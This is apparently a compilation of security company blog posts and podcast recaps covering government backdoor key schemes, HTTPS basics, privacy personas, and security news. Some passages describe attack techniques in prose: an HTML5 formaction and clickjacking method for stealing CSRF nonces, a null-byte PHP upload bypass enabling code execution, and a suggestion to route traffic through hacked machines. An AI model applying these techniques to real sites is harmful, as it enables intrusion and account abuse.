#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ stand off with Admiral Mike Rogers, I got to thinking about what the Admiral must be saying when he insisted that government “front doors” were technically possible to create in a way that didn’t give them ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain to you why that is a bad idea and propose a technically less dangerous one.

Barring any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or the future where we have to provide similar access to any government that asks, there are some legitimate reasons this design is bad. First a brief primer on how split-keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password “Will”. “Will Wheaton” is a very weak password, but it’s made significantly weaker when one party knows at least half of the secret. But it gets worse. Let’s say government agency B (the FISA court) has the second half of the password “Wheaton”. Eventually they need to combine the password somewhere. That physical place is a place where both halves of the password have to be typed in at the same time. Let’s call it a SCIF for argument’s sake.

In this example the SCIF is now the one place where all secrets go, and makes it a prime target to attack. Now both parties can see the data, instead of it just being one party. There may be situations where truly only one party should see the data. If the password is always the same for every piece of encrypted information for all conversations, it practically guarantees abuse once both halves are known. Not only is it significantly easier to break the original encryption since both parties have half the key material, but it has also created a single place where two parties now have to combine their two halves and it is far more likely to be abused.

What happens when access to that user’s data is no longer deemed useful? Does the key no longer become useful? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No – that’s not how passwords or keys work when they have to work everywhere all the time. All they can do is tell Apple, or Google or whoever created the backdoor to change the user’s keys and/or create a different backdoor password to be created. That’s one of the major drawbacks of this model. It could also inadvertently tip off the suspect in the process if they notice a new key being issued as well, depending on how it was implemented.

Now let’s take a slightly different scenario where Apple/Google had a rolling window where passwords changed every day, say. One day it was “Will Wheaton” the next it was “Darth Vader” and so on. That way the FBI/NSA and the FISA courts could subpoena any piece of information but it had to be marked with a certain time period (say ten days and they would use their corresponding 10 keys split into two parts each for a grand total of 20 key-halves). That way, they only had access to certain pieces of information and only for that one conversation, and nothing after that time period. That has a better chance of being successful, but still relies on the parties to come together at some point and allows them both to see the resultant classified material.

A more useful approach would be to have four sets of keys for each time-slice of one day. Key 1 and 2 belonged to the FBI/NSA and Key 3 and 4 belonged to the FISA court. Key 1 would decrypt to a blob of further encrypted material that would only be decrypted fully by Key 3 (think of Key 1 as the outer slice of an onion and Key 3 the inner slice to get to the center). Also Key 4 would decrypt a blob of decrypted material that could only be fully decrypted by key 2. That way you could guarantee that neither individual key could be subverted to fully decrypt without the other’s involvement. It would also allow either or both to see the resultant material should they need it but not without each other’s approval. It would also guarantee that the key material wouldn’t be abused beyond the time slice for the conversation in question.

So here is how it would break down. FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and FBI/NSA request Apple/Google give them the time slice of Tuesday and Wednesday. Apple/Google respond with corresponding numbers 1234 and 1235 with corresponding blobs of encrypted text (if the FBI/NSA don’t already have it).. FBI/NSA request that FISA decrypt the blobs with Key 4(Tuesday) and Key 4(Wednesday) corresponding with conversation 1234 and 1235. FISA returns two encrypted blobs that won’t be useful until the FBI/NSA use their Key 2(Tuesday) and Key 2(Wednesday) corresponding with the time slice Tuesday and Wednesday for conversation 1234 and 1235. The FBI/NSA decrypt the final encrypted blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoena’d. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the Court also needs to see the data, corresponding keys 1 and 3 are used for the same time-slice against the corresponding blobs of data.

Of course this is a huge burden, because now each user has four keys that need to be created for each day. Assuming there are 3 billion people in the world, and they use probably 3 different types of chatting systems per day, that would require something like 36 billion keys to be shared by two government agencies (18 billion each) per day. That’s a lot. Not to mention that keys wouldn’t just be short passwords, but presumably something like x509 or GPG certs, which can be quite large. And that also assumes that they can somehow get access to those keys in a way that the other (or malicious 3rd parties) can’t intercept or see. The devil lies deep in those details.

Ultimately though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve for the technical problems we have to be extremely thoughtful on how or even if we deploy it at all. Even when one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that the idea of freedom of expression will be lost in the annals of time. We all have to decide: would we rather have security in the form of big brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: it’s the letter ’S’. The ’s’ I’m referring to is the ’S’ in HTTPS. You may never have seen the ’S’ before in your web browser, or you may have seen it and never realized it’s importance. You may know it as that thing that gets added before the website you type in. What is it’s meaning? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are referred to as ‘protocols’. In essence, these protocols are defining how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP, while others use HTTPS. If you bring up CNN’s home page edition.cnn.com you’ll notice that it either shows http in front of the URL in the URL bar or just edition.cnn.com. This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data over the HTTP protocol can be intercepted and read at any point between you and the website’s computer. This is what’s known as a ‘man-in-the-middle’ (MITM). A person listening in on your virtual conversation between your computer and the website’s computer can look at all the data that’s being sent. This isn’t a big deal if you’re looking at articles on CNN or searching for content on Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. The protocol HTTPS is a way of securely sending data from your computer to the website you are interacting with. If a site is using HTTPS you’ll notice the HTTPS in front of the URL. As an example, go to www.facebook.com. In more modern and up-to-date browsers, you’ll likely see the HTTPS colored in either green or red and a lock icon. The green text with the lock icon is stating that you’re communicating securely with this website and everything looks to be going well.

If the https is red, there is probably some type of issue with the site security. It may be that the site’s certificate is out of date or invalid, or it may be that the site includes insecure third-party content, or there may be other issues. In any case, it is always safest not to proceed with a transaction that involves information you would like to keep secure if the HTTPS and lock icon are not green.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy who is performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language that’s been made up by the two people talking. Anytime you are doing anything that requires a login, credit card number, social security numbers, or ANY private data, you want to make sure that you see that HTTPS protocol, and if you have the benefit of modern browsers, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs and we were impressed to see that 87% of the respondents perform static analysis. 32% of them perform it with each major release and 13% are performing it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibly into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion and perhaps intentional fear uncertainty and doubt (FUD) in this area. The way you go about testing third party software should mirror the way you go about testing your own software. Binary analysis of software for the purpose of not exposing your Intellectual Property (IP) is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort is no problem. Tools such as ILSpy and Show My Code are freely and widely available.Sharing your binaries in an attempt to protect your Intellectual Property actually end up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options that allow for binary review that other vendors require. Or at a very minimum it requires that those same binaries never get uploaded to production where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP you need to make certain your binaries don’t fall into the wrong hands, because inside of those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

Introducing Craig Hinkley, WhiteHat Security CEO

As many of you know, I took on the role of “interim” CEO in February 2014, and along with the management team, led WhiteHat through a much needed period of re-strategizing and narrowing our focus onto the needs of our customers. In that time, we made great progress and improved every single metric that matters.

All the while, the Board of Directors and I were diligently searching to find the right person to step in as the permanent CEO. As founder, I may be biased, but WhiteHat is not just another security company. WhiteHat is something special and the work we do, web security, is important to the world. We needed a long-term CEO equal to the task. We needed someone who is passionate about web security and capable of taking WhiteHat to the next level; someone with the right skill set, experience, drive, vision, customer dedication, and most importantly, the ability to execute with us. Every. Single. Day.

At long last, we have found that person. On behalf of everyone here at WhiteHat Security, I am happy to introduce our new CEO, Craig Hinkley. Craig is an accomplished leader and I am confident that he is the right person to build on the foundation and momentum achieved by the WhiteHat team. While Craig’s resume is certainly impressive, it barely begins to do him justice. He’s the type of person who is driven, immediately engaging, and open to new ideas, while inspiring vision and excitement. We look forward to the key leadership he will bring to the WhiteHat team.

Many of you are probably asking, “What does this mean for Jeremiah?” My passion is, and continues to be, Web security, and WhiteHat is the very best place to do that. The vast majority of my day-to-day activity will remain largely unchanged. I will be heavily focused on our technology, product innovation, and strategy. With Craig on board, I’ll be freed up to focus more of my time and attention on those critical details.

Now, please join me in welcoming Craig as he takes the helm as CEO of WhiteHat Security.

View the official press release here.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on the reasons why they care and the lengths they are both willing and able to go through to protect that privacy. This is a brief run-down on some various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user can actually be embodied by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which is to say that spending time on security has a negative financial tradeoff for most of the population when taken in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself and is more concerned about usability and convenience. He feels that the more he does to protect himself, the more inconvenient life is. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He choses weak security questions. He uses password managers. He clicks through any warning he sees. He downloads all of the programs he finds regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third party testing by asking for certificates of attestation, or attempt to self-host where possible (E.g. local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software, VPNs and logs out of anything sensitive when finished. Ideally she should use a second browser for banking versus Internet activities. She shouldn’t click on links out of emails, shouldn’t install any unknown applications and even shouldn’t download trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating or seems to not look “right”, she should avoid it. It may have been hacked or taken over. She should also do reputation checking on the site using Web of Trust or similar tools. She should look for the lock in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for every software that is already on her computer, uninstall anything she doesn’t need and make sure all services are disabled that aren’t necessary. If anything looks suspicious, she should ask a more technical person for help, and make sure she has backups of everything in the case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insomuch as that it enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. Therefore, he places trust in poor places, mistakenly thinking he is somehow protected by geography or rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, like ad-blocking software like Disconnect or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key that no one has ever used posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone and still uses third party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed and his social media is easily crawled/monitored. Also, his whereabouts are always monitored in several different ways through his phone and social media. He is at risk of putting people’s lives in danger due to how he operates. He needs to have complete isolation and compartmentalization of his two lives. Meaning, his work computer and personal email/social presence should not intertwine. All sensitive stuff should be done through anonymous networks, and using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones and he should be avoiding any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of her friends and family around her are at risk because of what she is working on. She cannot rely on anyone she knows to help her because it will put them and ultimately, herself, in the process. She is well read on all topics of Internet security and privacy and she takes absolutely every last precaution to protect her identity.
  • Advice for Eve: Eve needs to got to incredible lengths to use false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect into wifi at distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should be using plausible deniability (E.g. VeraCrypt) and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped down version of Tails, running various plugins that ensure that her browser is incapable of doing her harm. That includes plugins like NoScript, Request Policy, HTTPS Everywhere, etc. She should never go to the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash and barter/trade. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits, and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted due to voice-prints and phone-line/background noise forensics. All of her IDs should be put into a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or surroundings, and never talk to anyone she knows personally while surfing online. She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is the fact that we tend to give generic one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect but it never could be. People’s backgrounds are so diverse and varied, that it would be impossible to precisely fit any one person into any bucket. Therefore privacy advice must be tailored to people’s ability to understand their interest in protecting themselves and the actual threat they’re facing.

Also, we often are talking at odds with regards to privacy vs security. Even if we didn’t have to worry about the intentions of those giving advice, as discussed in that video, we still can’t rely on the advice itself necessarily. Nor can we rely on the advice being well taken by the person we are giving it to. One party might fully believe that they’re doing all they need to be doing, while they are in fact making it extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs/interest/abilities with regards to privacy – age, sex, race, religion, cultural differences, philosophies, their location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice it is guaranteed to be a bad fit for most people.

#HackerKast 30: Verizon Supercookie, Tesla Stock April Fools, Bugs in Tor, YouTube Bounty Hack, ‘Do Not Track’ and Microsoft

Hey All! We made it to 30 Episodes! Thanks for coming along for the ride, and hope you’re enjoying HackerKast. Now… the news!

First we talked about the follow up to a story we spoke about a few weeks back that had to do with Verizon tracking its customers. They were doing this by implementing a sort of “supercookie” which was injected into HTTP requests on their end. This isn’t something that would go away if you cleared your cache, cookies, browser files, etc. This was basically the glitter of user tracking, it never went away. News this week was that Verizon spokespeople made some hand wavy announcement of how this isn’t a problem since users can opt-out of this tracking if they wish. The problem we discuss here is that nobody is going to do that or even take the time to figure out how to do it via some random Verizon web interface. Bad form on Verizon’s part and just shows that the users’ interests are not truly at the heart here. The age old adage of “if you aren’t paying for it, you’re the product” doesn’t even apply here since you ARE paying for Verizon. They are just squeezing your data for more money.

Privacy tangent aside, in lighter news, the stock market is being automated! Lighter news? I guess so, due to the context here of an April Fools joke by Tesla. They announced the brand new ‘Model W’ which caused a bit of a commotion amongst the robots on the Internet. Turns out the Model W wasn’t a new line of Tesla cars but a joke about them making a watch which could do phenomenal things such as telling time. At the time of this announcement a bunch of excited robots made Tesla stock jump by nearly 1% and there were over 400,000 trades in 60 seconds, which was the largest surge for Tesla since their IPO. This may be a funny instance of this but it is a scary thought that a practical joke could have cost people hundreds of thousands of dollars because of some trigger happy robots.

Next, we talked about some new issues discovered and written about with Tor. In this case, we are talking about Denial of Service technique that is unique to a Tor Hidden Service. By using a ton of requests that open up “circuits” to hidden services, which kind of act like sockets, an attacker can flood the server and take it down. By building up a lot of these circuits, a hidden service will need to utilize a ton of CPU and memory to handle all of this. This is being called a bug but Robert doesn’t like that terminology because it is kind of by design how hidden services work, just being used maliciously.

Now we are talking about something we all really like the sound of, deleting Justin Bieber videos off the Internet. Well, that was the click bait for this one. The real topic is that a researcher found a way to delete any video off of YouTube immediately. Turns out that Google paid this researcher $5,000 for this bug which we all agreed seemed a bit low for such a serious bug, but we might not have all the information. The funny part here is the researcher discussed how hard it was to fight the urge to not deleting Bieber fan channels. Good bug.

Lastly, Microsoft announced that it will not be supporting ‘Do Not Track’ by default in the next version of their browsers, whatever they are calling it these days. This is coming right after ‘Do Not Track’ was finally supported by default only in their latest version of Internet Explorer. This sounds like a loss for privacy of the users but, in reality, DNT doesn’t really work. Nobody really pays attention to this and it costs more bandwidth anyway so there really is no point at this stage in the game.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Verizon Customers Can Now Opt Out of Supercookie Due to Government Pressure
Tesla Stockholders Can’t take a Joke
Bugs in Tor Network Used In Attacks Against Underground Markets
YouTube hack ‘threatened’ Justin Bieber videos
‘Do Not Track’ no longer default setting for Microsoft browsers

Notable stories this week that didn’t make the cut:
Turkey Blocks Social Media Again – People Resort to Posters to Educate

#HackerKast 29: China DDoS Github, IAB endorses SSL use in ads, Cisco praising Adblock, SEA hacks Bluehost and more, Google XSS around the world, PHP file upload vuln

Hey Everybody! Welcome to this weeks HackerKast!

First story we talked about this week was the latest DDoS attack on GitHub which was coming from China this time. The fact that it was a DDoS wasn’t the interesting bit, it was the method of DDoS we were focusing on. Turns out, the avenue of attack here seemed an awful lot like Jeremiah and my BlackHat research on “Million Browser Botnet”. The attackers were utilizing Baidu analytics JavaScript to force unknowing browsers to constantly reload two specific GitHub pages. Of course, this is slightly different than ad network delivery but the concept is pretty much the same. The other scary part is that the attacking browsers were only about 1% of the Baidu analytics traffic, if this was ramped up a significant amount then who knows what it would’ve looked like.

Next, in a related ad network story, we talked about the IAB writing a blog post announcing they would encourage all their members and partners to utilize SSL properly. This got a chuckle from us because the advertising industry is advocating security. If this would happen, SSL everywhere would be one step closer to being feasible without breaking ad networks. This would’ve stopped China from Man-in-the-Middling these ads and injecting anything into them.

Also related, Jeremiah touched on a post put out by Cisco praising ad blocking to combat drive by malware downloads. We all got a laugh out of this as we’ve been saying it for years so for somebody like Cisco to say it is funny. None of us are against the idea of advertising completely, but it is dangerous on the Internet.

Back to the hacking, Robert talked about the Syrian Electronic Army hacking the umbrella company that owns BlueHost, Justhost, Hostgator, and more. Due to a few VPN hacks, the SEA is claiming they got access to the administrator panels on all of these shared hosting providers, and in turn their customers. This was a hacktivism motivated event due to these shared hosting providers hosting the Islamic State websites which the SEA is against. We wrapped up this topic with some thoughts on overall shared hosting security, seems to us like a big single point of failure on the web.

In other hacking news, a creative bounty hunter found some fun XSS recently and displayed it in a fun way. This researcher found an XSS bug in Google that not only worked on the .com domains but actually worked on *every* Google TLD around the world. This led them to create a YouTube video called “Google XSS World Tour” with some fun classical music and an ever redirecting browser demonstrating the XSS working on many international Google domains. One bug to rule them all… or something like that…

Last, we talked about a PHP file upload vulnerability that was found this week. Seems there is a core PHP function called move_uploaded_file which is vulnerable to a clever bug which avoids file type validation. With just the addition of a null byte at the end of your file name, you can upload any file type you’d like and execute malicious code on the PHP web server. With a quick search on GitHub for move_uploaded_file, we get 245,006 results of code using this vulnerable function.

github_screenshot

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Syrian Electronic Army Hacks BlueHost, Justhost, Hostgator, Fastdomain, Hostmonster to go after Islamic State
Cisco recommends Adblock & Ghostery to combat malvertising
Google XSS World Tour
China’s Man-on-the-Side Attack on GitHub
Adopting Encryption: The Need for HTTPS
Exploiting PHP Upload Forms

Notable stories this week that didn’t make the cut:
Google to drop China’s CNNIC Root Certificate Authority after trust breach
Obama Declares War on Foreign Hackers
AllCrypt Hacked Using Brute Force and Password Reset
The old is new, again. CVE-2011-2461 is back!
Instagram API Bug Could Allow Malicious File Downloads
DEA Charged with Being Mole for Silkroad

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even if it is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack from HTML injection.

For example, let’s say you have a site that has CSP set up to prevent inline and remote JavaScript from loading using the nonce feature, which requires all script tags to include the nonce before they will load. The nonce is probably based on some locally known secret XOR’d with the user’s credential or something similar. Whatever the case the CSP nonce is not known. But what they really want to do is submit some form. Now the form itself might protect itself in a different way, using a server-generated nonce (a second one) to prevent cross site request forgeries. Barring any side channel attacks, MitM attacks or attacks against the server itself, it seems like this might stop you in your tracks.

HTML5 to the rescue! Let’s say the form has an id set of id=”form1″. HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can say that it belongs to any form using the “form” parameter (e.g. form=”form1”). That might be somewhat bad, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has a feature called formaction. Formaction allows me to change the location where the form is being submitted.

So if the attacker submits an input field that associates itself with the form that contains the secret nonce and also with the formaction directive which points the form to the attacker’s website, it’s pretty much game over if the user clicks on that button. So now the trick is to get the attacker to click on the button. Oh, if only there was a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!

So if the site is using CSP but not using X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click on the evil button that has set a formaction which points the form back to the attacker’s site. The attacker then takes that nonce, creates a page that automatically uses the nonces and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).

Scriptless attacks aren’t new, Mario Heiderich for example has been working on them for years, but they are deadly. It’s not quite the same thing as a cross domain read in this case, but it has the same effect – allowing the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages. But that only stops one form of the attack. It’s still possible to social engineer people and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me and why they need to change the form action after the fact — even overriding the original location — is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP to block formaction, but you have to do that or the attack will still work with other CSP rules. Also you can do the equivalent of X-Frame-Options in CSP as well. So a properly configured CSP might actually save you – very cool!

Security and the SDLC: Integrating application security in developer environments

As we wind down the end of the year, I thought it would be good to talk about some big thinking in regard to vuln classification and prioritization. There are two common overlooked issues when enterprises attempt to secure themselves:

1. Once a company finds out about a vulnerability, how do they track it? A company can end up with tens of thousands of vulnerabilities or more if their environment is large and complex enough. And we’re not talking about false positives – I mean real, remotely exploitable vulns.
2. How do you ensure the vulnerabilities actually get fixed? Just because you find a vulnerability doesn’t mean your developers know about it, or know to prioritize it, etc. And what if they just claim that it’s fixed…?

The problem is scale. Any off the shelf scanner will work fine when you’re talking about one app, or a few apps. But where they fall down is when they have to scan hundreds or thousands of apps. Not only do companies not have the manpower to manage all of those scans, and the associated credentials, but even if they did, they’re left with a huge homework assignment – transcribing thousands of vulns into some system that the developers know to look at.

Integration with some sort of case management system, therefore, is a critical component of SDLC (software/security development life cycle) integration. It’s not just a nice-to-have checklist item – if you aren’t doing it, vulns are getting lost, and that’s just a fact. Worse yet, if you don’t have bi-directional communication, vulns can get closed and then you’ll end up opening a new ticket every time you scan. Knowing which vuln corresponds to scanner findings allows you to see when a developer just wants to close a few tickets before 5PM on Friday. When the vulns all re-open on the next scan-run you’ll know who is just trying to game the system and therefore which developer/QA engineers are leaving you unnecessarily vulnerable.

Then you have the whole issue of vuln priority. Without knowing something about the systems in question you could inadvertently prioritize a vuln on an internal device ahead of something that is in production. Scanners are ultimately dumb (yes, it’s true, no matter how much we like to pretend they’re not) and they need to be told how to think about the environment. If your scanner can’t take in information from systems like Archer or similar GRC (Governance Risk Compliance) tools, to know how important a site is, it’s entirely possible that you’re fixing the wrong issues in the wrong order. It’s putting your company unnecessarily at risk and wasting resources in the process.

There is a real art to making sure you are looking at the correct vulns. The more you think about it, the more you’ll probably agree this is the right path forward – adding in all sorts of additional/useful criteria. For instance, knowing how much a site is getting attacked is useful. Knowing which sites take and store PII (personally identifiable information) is useful. Knowing which sites live in the DMZ (de-militarized zone) together is useful. All of those things can help you prioritize and stop wasting time on vulns that either don’t matter because they’re nearly impossible to exploit or are less critical because they are protected by other controls.

There’s obviously a lot more to it, but this should be a good primer on how to start thinking about vulns. If you want more information, we have several webinars that go into this in more gory detail. Either way, if you aren’t spending time identifying your assets and prioritizing them, you’re wasting time and money – and who’s got that?